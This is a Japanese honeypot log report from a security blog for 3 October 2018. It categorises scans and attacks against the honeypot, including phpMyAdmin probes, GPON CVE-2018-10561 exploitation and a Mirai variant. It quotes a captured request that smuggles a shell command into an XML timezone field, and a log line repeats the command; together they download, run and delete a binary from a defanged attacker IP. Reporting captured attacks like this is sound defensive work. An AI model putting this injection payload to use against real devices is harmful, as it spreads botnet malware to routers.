S-Owl

S(ecurity)Owl

ハニーポットのログ分析(2018/10/03)

WOWhoneypotの2018/10/03(水) (運用120日目)の簡易分析です。
本日の総アクセス件数は 57件です。

気になるアクセスは以下です。

・(新規)「HEAD /icons/apache_pb.gif」Apacheサーバの調査:1件
・Mirai亜種
  →以下のようなアクセスです。

POST / HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello-World
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>set_time_config</methodName><params><param><value><struct><member><name>timezone</name><value><string>"`cd /tmp; wget hxxp://68.183.28[.]29/juno -O -> /tmp/jno; sh /tmp/jno sonicwall; rm -rf /tmp/jno`"</string></value></member></struct></value></param></params></methodCall>

 取得するファイルは以下です。

https://urlscan.io/result/738ba824-7056-4062-b780-093cd207e96c

https://www.virustotal.com/#/file/d85921bb23c106613ff6a613c4b6342e014998edeb23d8ce5e26e441b4db5b53/detection

 

以下が全アクセスログです。

件数 日付 種別 リクエス
36 2018-10-03 アクセス GET /
2 2018-10-03 Mirai亜種 POST /
2 2018-10-03 不正中継の調査 GET hxxp://www.ip.cn/
2 2018-10-03 不正中継の調査 GET hxxp://www.123cha.com/
2 2018-10-03 不正中継の調査 GET hxxp://112.35.63.31:10083/index.php
2 2018-10-03 不正中継の調査 CONNECT cn.bing.com:443
1 2018-10-03 GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 POST /GponForm/diag_Form?style/
1 2018-10-03 GPONルータの脆弱性(CVE-2018-10561)を突くMirai亜種の攻撃 POST /GponForm/diag_Form?images/
1 2018-10-03 Apacheサーバの調査 HEAD /icons/apache_pb.gif
1 2018-10-03 脆弱性スキャンツールZmEuによる調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-10-03 クローリング GET /robots.txt
1 2018-10-03 phpMyAdminの調査 GET /pma/scripts/setup.php
1 2018-10-03 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
1 2018-10-03 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
1 2018-10-03 phpMyAdminの調査 GET /MyAdmin/scripts/setup.php
1 2018-10-03 phpMyAdminの調査 GET /myadmin/scripts/setup.php
1 2018-10-03 Tomcat管理ページへのブルートフォース攻撃 GET /manager/html


本日のドメイン名でのアクセスは以下です。

3 GET /
1 GET /robots.txt

本日のハンティングログは以下です。

2 2018-10-03 wget hxxp://68.183.28.29/juno

以上です。